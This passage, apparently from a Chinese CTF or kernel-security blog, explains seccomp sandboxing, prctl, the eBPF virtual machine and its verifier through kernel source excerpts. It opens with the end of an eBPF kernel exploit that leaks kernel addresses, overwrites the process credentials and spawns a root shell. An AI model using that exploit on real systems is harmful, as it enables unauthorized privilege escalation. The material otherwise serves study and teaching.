value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

puts("leak map_ops_addr");
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
LEAK_MAP_OPS(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_ops_addr = value[0];
printf("map_ops_addr: 0x%lx\n", map_ops_addr);

kernel_offset = map_ops_addr - ARRAY_MAP_OPS;
kernel_base += kernel_offset;
init_cred = INIT_CRED + kernel_offset;
printf("map_ops_addr: 0x%lx\n", map_ops_addr);
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

puts("leak map_addr");
struct bpf_insn prog2[] = {
TRIGGER_VULN(map_fd),
LEAK_MAP_ADDR(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog2, sizeof(prog2) / sizeof(prog2[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_addr = value[0] - 0x110;
printf("map_addr: 0x%lx\n", map_addr);

size_t next_task = INIT_TASK + kernel_offset + 0x818;
size_t data;

prctl(PR_SET_NAME, "11111111");
do{
next_task = read_arbitrary_addr(map_fd, next_task);
data = read_arbitrary_addr(map_fd, next_task + 0x2d0);
} while (data != *(size_t *)"11111111");

current_task = next_task - 0x818;
current_cred = read_arbitrary_addr(map_fd, current_task + 0xad8);
printf("current_task: 0x%lx\n", current_task);
printf("current_cred: 0x%lx\n", current_cred);

make_arbitrary_write_ops(map_fd);

key = 0;
value[0] = -1;
for (int i = 0; i < 8; i++){
if (bpf_map_update_elem(map_fd, &key, &value[0], current_cred + 4 + 4 * i) < 0){
printf("\033[31m\033[1m[x] Failed to ovwerwrite no.%d\033[0m\n", i);
err_exit("FAILED to call ops->map_push_elem()!");
}
}
get_root_shell();

return 0;
}

沙盒基础知识

在 CTF 的 pwn 题中一般有两种函数调用方式实现沙盒机制:

使用 prctl 系统调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<stddef.h>
#include<linux/seccomp.h>
#include<linux/filter.h>
#include<sys/prctl.h>
#include<linux/bpf.h>
#include<sys/types.h>

int main(){
struct sock_filter filter[]={
BPF_STMT(BPF_LD|BPF_W|BPF_ABS, 0),
BPF_JUMP(BPF_JMP|BPF_JEQ, 59, 1, 0),
BPF_JUMP(BPF_JMP|BPF_JGE, 0, 1, 0),
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ERRNO),
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
};
struct sock_fprog prog={
.len=sizeof(filter)/sizeof(filter[0]),
.filter=filter,
};
prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
syscall(59,"/bin/sh",NULL,NULL);
return 0;
}
1
2
3
4
5
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0003
0002: 0x35 0x01 0x00 0x00000000 if (A >= 0x0) goto 0004
0003: 0x06 0x00 0x00 0x00050000 return ERRNO(0)
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW

使用 seccomp 库函数:

1
2
3
4
5
6
7
8
9
10
11
12
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

int main(void){
scmp_filter_ctx ctx;
ctx = seccomp_init(SCMP_ACT_ALLOW);
seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
seccomp_load(ctx);
syscall(59,"/bin/sh",NULL,NULL);
return 0;
}
1
2
3
4
5
6
7
8
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
  • seccomp_load 函数进行逆向分析,可以发现其底层也是使用 prctl 系统调用
1
v17 = prctl(38LL, 1LL, 0LL, 0LL, 0LL); /* PR_SET_NO_NEW_PRIVS */
1
v14 = prctl(22LL, 2LL, v10, v10, v7); /* PR_SET_SECCOMP */

prctl 系统调用

prctl(Process Control Language,进程控制语言)是一个 Linux 系统调用的一个重要工具,它可以对进程进行各种管理和控制操作

prctl 提供了对进程的许多控制和设置,使用第一个参数来指定其功能:

  • 设置进程的权限级别
  • 设置进程的调度参数
  • 设置进程的内存限制
  • 设置进程的 CPU 时间限制
  • 设置进程的信号处理
  • 设置进程的资源限制
  • 设置进程的属性
  • 获取进程的属性

沙盒需要的 prctl 功能如下:

  • prctl(PR_SET_NO_NEW_PRIVS):命名空间内以 CAP_SYS_ADMIN 权限运行(子进程会保证不会赋予运行进程新的权限)
  • prctl(PR_SET_SECCOMP):第二个参数是设置的过滤模式,第三个参数是设置的过滤规则
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
struct task_struct *me = current;
unsigned char comm[sizeof(me->comm)];
long error;

error = security_task_prctl(option, arg2, arg3, arg4, arg5);
if (error != -ENOSYS)
return error;

error = 0;
switch (option) {
......

case PR_SET_SECCOMP:
error = prctl_set_seccomp(arg2, (char __user *)arg3);
break;

......

case PR_SET_NO_NEW_PRIVS:
if (arg2 != 1 || arg3 || arg4 || arg5)
return -EINVAL;

task_set_no_new_privs(current);
break;

......

default:
error = -EINVAL;
break;
}
return error;
}

核心函数 prctl_set_seccomp 的调用链如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
long prctl_set_seccomp(unsigned long seccomp_mode, void __user *filter)
{
unsigned int op;
void __user *uargs;

switch (seccomp_mode) {
case SECCOMP_MODE_STRICT: /* 严格模式(所有的syscall都被检查和过滤) */
op = SECCOMP_SET_MODE_STRICT;
uargs = NULL;
break;
case SECCOMP_MODE_FILTER: /* 过滤模式(所有的syscall都被允许,但是某些syscall可能会被过滤器拒绝) */
op = SECCOMP_SET_MODE_FILTER;
uargs = filter;
break;
default:
return -EINVAL;
}

return do_seccomp(op, 0, uargs);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static long do_seccomp(unsigned int op, unsigned int flags,
void __user *uargs)
{
switch (op) {
case SECCOMP_SET_MODE_STRICT: /* 严格模式 */
if (flags != 0 || uargs != NULL)
return -EINVAL;
return seccomp_set_mode_strict();
case SECCOMP_SET_MODE_FILTER: /* 过滤模式 */
return seccomp_set_mode_filter(flags, uargs);
case SECCOMP_GET_ACTION_AVAIL: /* 用于查询特定的action是否被内核支持 */
if (flags != 0)
return -EINVAL;

return seccomp_get_action_avail(uargs);
case SECCOMP_GET_NOTIF_SIZES: /* 获取指定进程的安全上下文通知大小 */
if (flags != 0)
return -EINVAL;

return seccomp_get_notif_sizes(uargs);
default:
return -EINVAL;
}
}

这里我们重点分析过滤模式的 seccomp_set_mode_filter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
static long seccomp_set_mode_filter(unsigned int flags,
const char __user *filter)
{
const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
struct seccomp_filter *prepared = NULL;
long ret = -EINVAL;
int listener = -1;
struct file *listener_f = NULL;

......

prepared = seccomp_prepare_user_filter(filter); /* 在持有锁之前准备新过滤器 */
if (IS_ERR(prepared))
return PTR_ERR(prepared);

if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
listener = get_unused_fd_flags(O_CLOEXEC);
if (listener < 0) {
ret = listener;
goto out_free;
}

listener_f = init_listener(prepared); /* 初始化一个监听器,用于接收来自内核的通知和事件 */
if (IS_ERR(listener_f)) {
put_unused_fd(listener);
ret = PTR_ERR(listener_f);
goto out_free;
}
}

if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
mutex_lock_killable(&current->signal->cred_guard_mutex))
goto out_put_fd;

spin_lock_irq(&current->sighand->siglock);

if (!seccomp_may_assign_mode(seccomp_mode))
goto out;

if (has_duplicate_listener(prepared)) { /* 检查一个进程是否已经有一个监听器 */
ret = -EBUSY;
goto out;
}

ret = seccomp_attach_filter(flags, prepared); /* 将一个过滤器附加到受限制的安全上下文中 */
if (ret)
goto out;
/* Do not free the successfully attached filter. */
prepared = NULL;

seccomp_assign_mode(current, seccomp_mode, flags); /* 将一个受限制的安全上下文分配给一个进程(current当前进程) */
out:
spin_unlock_irq(&current->sighand->siglock);
if (flags & SECCOMP_FILTER_FLAG_TSYNC)
mutex_unlock(&current->signal->cred_guard_mutex);
out_put_fd:
if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
if (ret) {
listener_f->private_data = NULL;
fput(listener_f); /* 释放对文件的最后一个引用 */
put_unused_fd(listener); /* 说明目标文件描述符已经不再使用 */
seccomp_notify_detach(prepared);
} else {
fd_install(listener, listener_f);
ret = listener;
}
}
out_free:
seccomp_filter_free(prepared);
return ret;
}
  • 其最核心的工作就是在 current->seccomp.filter 中注册过滤器:
1
2
3
filter->prev = current->seccomp.filter;
current->seccomp.filter = filter;
atomic_inc(&current->seccomp.filter_count);

如果使用了 FILTER 模式,则调用 seccomp_run_filters 函数来进行所有指令判断过滤,系统调用号作为参数传递,根据返回值来进行后续处理

这里我们分析一下从 syscall 入口函数 entry_SYSCALL_compatseccomp_run_filters 的调用链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
SYM_CODE_START(entry_SYSCALL_compat)
UNWIND_HINT_EMPTY
/* Interrupts are off on entry. */
swapgs

/* Stash user ESP */
movl %esp, %r8d

/* Use %rsp as scratch reg. User ESP is stashed in r8 */
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
......
movq %rsp, %rdi
call do_fast_syscall_32
......
SWITCH_TO_USER_CR3_NOSTACK scratch_reg=%r8 scratch_reg2=%r9

xorl %r8d, %r8d
xorl %r9d, %r9d
xorl %r10d, %r10d
swapgs
sysretl
SYM_CODE_END(entry_SYSCALL_compat)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static noinstr bool __do_fast_syscall_32(struct pt_regs *regs)
{
unsigned int nr = syscall_32_enter(regs);
int res;

......

/* The case truncates any ptrace induced syscall nr > 2^32 -1 */
nr = (unsigned int)syscall_enter_from_user_mode_work(regs, nr);

/* Now this is just like a normal syscall. */
do_syscall_32_irqs_on(regs, nr);
syscall_exit_to_user_mode(regs);
return true;
}
1
2
3
4
long syscall_enter_from_user_mode_work(struct pt_regs *regs, long syscall)
{
return __syscall_enter_from_user_work(regs, syscall);
}
1
2
3
4
5
6
7
8
9
10
11
static __always_inline long
__syscall_enter_from_user_work(struct pt_regs *regs, long syscall)
{
unsigned long ti_work;

ti_work = READ_ONCE(current_thread_info()->flags);
if (ti_work & SYSCALL_ENTER_WORK)
syscall = syscall_trace_enter(regs, syscall, ti_work);

return syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static long syscall_trace_enter(struct pt_regs *regs, long syscall,
unsigned long ti_work)
{
long ret = 0;

......

if (ti_work & _TIF_SECCOMP) {
ret = __secure_computing(NULL);
if (ret == -1L)
return ret;
}

......

return ret ? : syscall;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
int __secure_computing(const struct seccomp_data *sd)
{
int mode = current->seccomp.mode;
int this_syscall;

if (IS_ENABLED(CONFIG_CHECKPOINT_RESTORE) &&
unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
return 0;

this_syscall =
sd ? sd->nr : syscall_get_nr(current, task_pt_regs(current));

switch (mode) {
case SECCOMP_MODE_STRICT:
__secure_computing_strict(this_syscall); /* may call do_exit */
return 0;
case SECCOMP_MODE_FILTER:
return __seccomp_filter(this_syscall, sd, false);
default:
BUG();
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static int __seccomp_filter(int this_syscall, const struct seccomp_data *sd,
const bool recheck_after_trace)
{
u32 filter_ret, action;
struct seccomp_filter *match = NULL;
int data;
struct seccomp_data sd_local;

rmb();

if (!sd) {
populate_seccomp_data(&sd_local);
sd = &sd_local;
}

filter_ret = seccomp_run_filters(sd, &match);

......

skip:
seccomp_log(this_syscall, 0, action, match ? match->log : false);
return -1;
}

指令过滤函数 seccomp_run_filters 的源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static u32 seccomp_run_filters(const struct seccomp_data *sd,
struct seccomp_filter **match)
{
u32 ret = SECCOMP_RET_ALLOW;
/* Make sure cross-thread synced filter points somewhere sane. */
struct seccomp_filter *f = READ_ONCE(current->seccomp.filter);

/* Ensure unexpected behavior doesn't result in failing open. */
if (WARN_ON(f == NULL))
return SECCOMP_RET_KILL_PROCESS;

/*
* All filters in the list are evaluated and the lowest BPF return
* value always takes priority (ignoring the DATA).
*/
for (; f; f = f->prev) {
u32 cur_ret = bpf_prog_run_pin_on_cpu(f->prog, sd); /* 用于运行BPF程序的函数 */

if (ACTION_ONLY(cur_ret) < ACTION_ONLY(ret)) {
ret = cur_ret;
*match = f;
}
}
return ret;
}
  • bpf_prog_run_pin_on_cpu 是一个用于运行 BPF 程序的函数,该函数将 BPF 程序加载到指定 CPU 的内存中,并将其附加到指定 CPU 的运行队列中
1
2
3
4
5
6
7
8
9
10
static inline u32 bpf_prog_run_pin_on_cpu(const struct bpf_prog *prog,
const void *ctx)
{
u32 ret;

migrate_disable(); /* 禁用内核进程迁移 */
ret = __BPF_PROG_RUN(prog, ctx, bpf_dispatcher_nop_func); /* 运行BPF程序 */
migrate_enable(); /* 启用内核进程迁移 */
return ret;
}

eBPF 虚拟机

Linux 下 eBPF 的整体架构如下图所示:

  • 传入:用户进程首先在用户空间编写相应的 BPF 字节码程序,传入内核
  • 检查:内核通过 verifier 对字节码程序进行安全性检查
  • 编译 or 解释:通过检查后便通过 JIT 编译运行,或者直接解释运行 BPF 字节码
  • 映射:用以保存数据的通用结构,可以在不同的 eBPF 程序之间或是用户进程与内核间共享数据(不同的 eBPF 程序之间可以共享同一个映射)

eBPF 底层是一个使用 RISC 指令集的虚拟机,使用11个64位寄存器和一个固定大小为512字节的栈:

  • 其中9个寄存器是通用寄存器
  • 一个只读栈帧寄存器

寄存器总是64位大小,在32位机器上会默认把前32位置零,这也为 eBPF 提供了交叉编译的兼容性,各个寄存器的功能如下:

  • R0: RAX,存放函数返回值或程序退出状态码
  • R1: RDI,第一个实参
  • R2: RSI,第二个实参
  • R3: RDX,第三个实参
  • R4: RCX,第四个实参
  • R5: R8,第五个实参
  • R6: RBX,callee saved
  • R7: R13,callee saved
  • R8: R14,callee saved
  • R9: R15,callee saved
  • R10: RBP,只读栈帧

在 eBPF 中,一个寄存器的状态信息使用 bpf_reg_state 进行表示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
struct bpf_reg_state {
/* Ordering of fields matters. See states_equal() */
enum bpf_reg_type type; /* 记录寄存器类型 */
/* Fixed part of pointer offset, pointer types only */
s32 off;
union {
/* valid when type == PTR_TO_PACKET */
int range;

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;

/* for PTR_TO_BTF_ID */
struct {
struct btf *btf;
u32 btf_id;
};

u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

/* Max size from any of the above. */
struct {
unsigned long raw1;
unsigned long raw2;
} raw;
};
/* For PTR_TO_PACKET, used to find other pointers with the same variable
* offset, so they can share range knowledge.
* For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
* came from, when one is tested for != NULL.
* For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
* for the purpose of tracking that it's freed.
* For PTR_TO_SOCKET this is used to share which pointers retain the
* same reference to the socket, to determine proper reference freeing.
*/
u32 id;
/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
* from a pointer-cast helper, bpf_sk_fullsock() and
* bpf_tcp_sock().
*
* Consider the following where "sk" is a reference counted
* pointer returned from "sk = bpf_sk_lookup_tcp();":
*
* 1: sk = bpf_sk_lookup_tcp();
* 2: if (!sk) { return 0; }
* 3: fullsock = bpf_sk_fullsock(sk);
* 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
* 5: tp = bpf_tcp_sock(fullsock);
* 6: if (!tp) { bpf_sk_release(sk); return 0; }
* 7: bpf_sk_release(sk);
* 8: snd_cwnd = tp->snd_cwnd; // verifier will complain
*
* After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
* "tp" ptr should be invalidated also. In order to do that,
* the reg holding "fullsock" and "sk" need to remember
* the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
* such that the verifier can reset all regs which have
* ref_obj_id matching the sk_reg->id.
*
* sk_reg->ref_obj_id is set to sk_reg->id at line 1.
* sk_reg->id will stay as NULL-marking purpose only.
* After NULL-marking is done, sk_reg->id can be reset to 0.
*
* After "fullsock = bpf_sk_fullsock(sk);" at line 3,
* fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
*
* After "tp = bpf_tcp_sock(fullsock);" at line 5,
* tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
* which is the same as sk_reg->ref_obj_id.
*
* From the verifier perspective, if sk, fullsock and tp
* are not NULL, they are the same ptr with different
* reg->type. In particular, bpf_sk_release(tp) is also
* allowed and has the same effect as bpf_sk_release(sk).
*/
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off;
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; /* minimum possible (s64)value */
s64 smax_value; /* maximum possible (s64)value */
u64 umin_value; /* minimum possible (u64)value */
u64 umax_value; /* maximum possible (u64)value */
s32 s32_min_value; /* minimum possible (s32)value */
s32 s32_max_value; /* maximum possible (s32)value */
u32 u32_min_value; /* minimum possible (u32)value */
u32 u32_max_value; /* maximum possible (u32)value */
/* parentage chain for liveness checking */
struct bpf_reg_state *parent;
/* Inside the callee two registers can be both PTR_TO_STACK like
* R1=fp-8 and R2=fp-8, but one of them points to this function stack
* while another to the caller's stack. To differentiate them 'frameno'
* is used which is an index in bpf_verifier_state->frame[] array
* pointing to bpf_func_state.
*/
u32 frameno;
/* Tracks subreg definition. The stored value is the insn_idx of the
* writing insn. This is safe because subreg_def is used before any insn
* patching which only happens after main verification finished.
*/
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

当 eBPF 字节码载入到内核中后,verifier 会对 eBPF 字节码进行一系列的检查,主要关注以下几个字段:

  • smin_valuesmax_value:64 位有符号的值的可能取值边界
  • umin_valueumax_value:64 位无符号的值的可能取值边界
  • s32_min_values32_max_value:32 位有符号的值的可能取值边界
  • u32_min_valueu32_max_value:32 位无符号的值的可能取值边界

核心检查函数就是 bpf_check,一个静态代码分析器:

  • 逐条遍历 eBPF 程序中的指令并更新寄存器 / 堆栈的状态,条件分支的所有路径都会被分析,直到 bpf_exit 指令
  • 这其实是一个模拟执行的过程,verifier 会推测寄存器的边界值,检查其是否符合规则
  • 模拟通过后才能正常加载 eBPF 程序

在其中用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

当 eBPF 字节码载入到内核中后,内核最终会使用一个 bpf_prog 结构体来表示一个 eBPF 程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
struct bpf_prog {
u16 pages; /* Number of allocated pages */
u16 jited:1, /* Is our filter JIT'ed? */
jit_requested:1,/* archs need to JIT the prog */
gpl_compatible:1, /* Is filter GPL compatible? */
cb_access:1, /* Is control block accessed? */
dst_needed:1, /* Do we need dst entry? */
blinded:1, /* Was blinded */
is_func:1, /* program is a bpf function */
kprobe_override:1, /* Do we override a kprobe? */
has_callchain_buf:1, /* callchain buffer allocated? */
enforce_expected_attach_type:1, /* Enforce expected_attach_type checking at attach time */
call_get_stack:1; /* Do we call bpf_get_stack() or bpf_get_stackid() */
enum bpf_prog_type type; /* Type of BPF program */
enum bpf_attach_type expected_attach_type; /* For some prog types */
u32 len; /* Number of filter blocks */
u32 jited_len; /* Size of jited insns in bytes */
u8 tag[BPF_TAG_SIZE];
struct bpf_prog_aux *aux; /* Auxiliary fields */
struct sock_fprog_kern *orig_prog; /* Original BPF program */
unsigned int (*bpf_func)(const void *ctx,
const struct bpf_insn *insn);
/* Instructions for interpreter */
struct sock_filter insns[0];
struct bpf_insn insnsi[];
};

接着就是编译,解释 eBPF 字节码,生成 bpf map 并记录在 bpf_reg_state->map_ptr

bpf map 是一个通用的用以储存不同种类数据的结构,用以在用户进程与 eBPF 程序、eBPF 程序与 eBPF 程序之间进行数据共享(这些数据以二进制形式储存,因此用户在创建时只需要指定 key 与 value 的 size)

核心结构体 bpf_map 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type; /* map的数据结构类型 */
u32 key_size; /* 以字节为单位的用以索引一个元素的key的size(在数组映射中使用) */
u32 value_size; /* 以字节为单位的每个元素的size */
u32 max_entries; /* map中entries的最大数量 */
u32 map_flags; /* 描述map的独特特征(例如是否整个map的内存应被预先分配等) */
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
#ifdef CONFIG_MEMCG_KMEM
struct mem_cgroup *memcg;
#endif
char name[BPF_OBJ_NAME_LEN];
u32 btf_vmlinux_value_type_id;
bool bypass_spec_v1;
bool frozen; /* write-once; write-protected by freeze_mutex */
/* 22 bytes hole */

/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
atomic64_t refcnt ____cacheline_aligned;
atomic64_t usercnt;
struct work_struct work;
struct mutex freeze_mutex;
u64 writecnt; /* writable mmap cnt; protected by freeze_mutex */
};

bpf map 有多种类型,记录于 bpf_map_type 枚举中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
enum bpf_map_type {
BPF_MAP_TYPE_UNSPEC,
BPF_MAP_TYPE_HASH, /* 以哈希表形式存储键值对(最常见) */
BPF_MAP_TYPE_ARRAY, /* 以数组形式存储键值对,key即为数组下标,value初始化为'0' */
BPF_MAP_TYPE_PROG_ARRAY, /* 特殊的数组映射,value为其他eBPF程序的文件描述符 */
BPF_MAP_TYPE_PERF_EVENT_ARRAY,
BPF_MAP_TYPE_PERCPU_HASH,
BPF_MAP_TYPE_PERCPU_ARRAY,
BPF_MAP_TYPE_STACK_TRACE,
BPF_MAP_TYPE_CGROUP_ARRAY,
BPF_MAP_TYPE_LRU_HASH,
BPF_MAP_TYPE_LRU_PERCPU_HASH,
BPF_MAP_TYPE_LPM_TRIE,
BPF_MAP_TYPE_ARRAY_OF_MAPS,
BPF_MAP_TYPE_HASH_OF_MAPS,
BPF_MAP_TYPE_DEVMAP,
BPF_MAP_TYPE_SOCKMAP,
BPF_MAP_TYPE_CPUMAP,
BPF_MAP_TYPE_XSKMAP,
BPF_MAP_TYPE_SOCKHASH,
BPF_MAP_TYPE_CGROUP_STORAGE,
BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
BPF_MAP_TYPE_QUEUE,
BPF_MAP_TYPE_STACK, /* 以栈形式存储数据 */
BPF_MAP_TYPE_SK_STORAGE,
BPF_MAP_TYPE_DEVMAP_HASH,
BPF_MAP_TYPE_STRUCT_OPS,
BPF_MAP_TYPE_RINGBUF,
BPF_MAP_TYPE_INODE_STORAGE,
BPF_MAP_TYPE_TASK_STORAGE,
};

Seccomp BPF

柏克莱封包过滤器(Berkeley Packet Filter,缩写 BPF),是类 Unix 系统上数据链路层的一种原始接口,提供原始链路层封包的收发,除此之外,如果网卡驱动支持洪泛模式,那么它可以让网卡处于此种模式,这样可以收到网络上的所有包,不管他们的目的地是不是所在主机

Seccomp BPF 是一种基于 Linux 内核的 BPF 过滤器,用于对 Linux 进程的系统调用进行过滤和拦截(eBPF 的一部分)

BPF 的指令集比较简单,开发人员定义了符号常量和两个方便的宏 BPF_STMTBPF_JUMP 可以用来方便的编写 BPF 规则

1
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,(offsetof(struct seccomp_data, arch)))
  • BPF_LD:建一个 BPF 加载操作
  • BPF_W:操作数大小是一个字
  • BPF_ABS:使用绝对偏移,即使用指令中的值作为数据区的偏移量,该值是体系结构字段与数据区域的偏移量
  • offsetof():生成数据区域中期望字段的偏移量
1
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K ,AUDIT_ARCH_X86_64 , 1, 0)
  • BPF_JMP | BPF JEQ 会创建一个相等跳转指令,它将指令中的值(即第二个参数)与累加器中的值(BPF_K)进行比较,判断是否相等
    • 如果架构是则跳过下一条指令(jt=1,代表测试为真,跳过一条指令)
    • 否则将执行下一条指令(jf=0,代表测试为假,继续执行下一条指令)

用户编写的 eBPF 程序最终会被编译成 eBPF 字节码,eBPF 字节码使用 bpf_insn 结构来表示,如下:

1
2
3
4
5
6
7
struct bpf_insn {
__u8 code; /* 操作码 */
__u8 dst_reg:4; /* 目标寄存器 */
__u8 src_reg:4; /* 源寄存器 */
__s16 off; /* 偏移量 */
__s32 imm; /* 立即操作数 */
};

eBPF 程序会被 LLVM/Clang 编译成 bpf_insn 结构数组,这里使用了 JIT 即时编译技术(PS:当 eBPF 字节码被加载到内核时,内核会根据是否开启了 JIT 功能选项,来决定是否将 eBPF 字节码编译成机器码)

内核通过 bpf_prog_load 函数来加载 eBPF 字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog; /* 保存eBPF程序的信息 */
int err;
char license[128];
bool is_gpl;

......

/* plain bpf_prog allocation */
prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); /* 初始化bpf_prog结构体 */
if (!prog)
return -ENOMEM;

......

/* run eBPF verifier */
err = bpf_check(&prog, attr, uattr);
if (err < 0)
goto free_used_maps;

prog = bpf_prog_select_runtime(prog, &err); /* 判断并使用jit进行编译 */
if (err < 0)
goto free_used_maps;

err = bpf_prog_alloc_id(prog);
if (err)
goto free_used_maps;

bpf_prog_kallsyms_add(prog);
perf_event_bpf_event(prog, PERF_BPF_EVENT_PROG_LOAD, 0);
bpf_audit_prog(prog, BPF_AUDIT_LOAD);

err = bpf_prog_new_fd(prog);
if (err < 0)
bpf_prog_put(prog);
return err;

free_used_maps:
/* In case we have subprogs, we need to wait for a grace
* period before we can tear down JIT memory since symbols
* are already exposed under kallsyms.
*/
__bpf_prog_put_noref(prog, prog->aux->func_cnt);
return err;
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_sec:
security_bpf_prog_free(prog->aux);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}
